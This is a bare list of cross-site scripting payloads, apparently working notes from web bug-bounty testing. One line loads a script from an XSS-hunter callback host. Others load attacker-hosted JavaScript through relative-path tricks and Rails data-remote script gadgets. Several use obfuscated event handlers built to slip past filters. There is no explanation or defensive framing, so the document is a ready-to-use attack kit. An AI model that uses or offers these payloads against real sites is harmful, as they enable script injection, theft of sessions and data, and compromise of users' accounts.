```
/*<script>$.getScript("//favoriteisdom.xss.ht")</script>@gmail.com

<Img/Srcdoc='<img src=../../../../../wbowling/wiki/raw/master/test.js>' OnLoad=import(src)>


<iframe srcdoc='<img src=../../../../../wbowling/wiki/raw/master/test.js>'></iframe>


"><img src=../../../../../wbowling/wiki/raw/master/test.js>

<a href="../../../../raw/main/X55.js">hi</a>


<a   
  data-remote="true"
  data-method="get"  
  data-type="script"
  href="/wbowling/wiki/raw/master/test.js" 
  class='atwho-view select2-drop-mask pika-select'>
</a>  
*/
```






</a> -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>


<img onerror=eval('al&#x5c;u0065rt(1)') src=a>

b2r%20%22%20%26#111;%26#110;mouseov%26#101;r%3d%26#112rompt(location.host)%20a=%22apple

b" onmouseover=prompt(1) a="1"

<![endif]-- onerror=\"<![endif]-->\" onload=\"<img src=1 onerror='prompt(1)' />\">












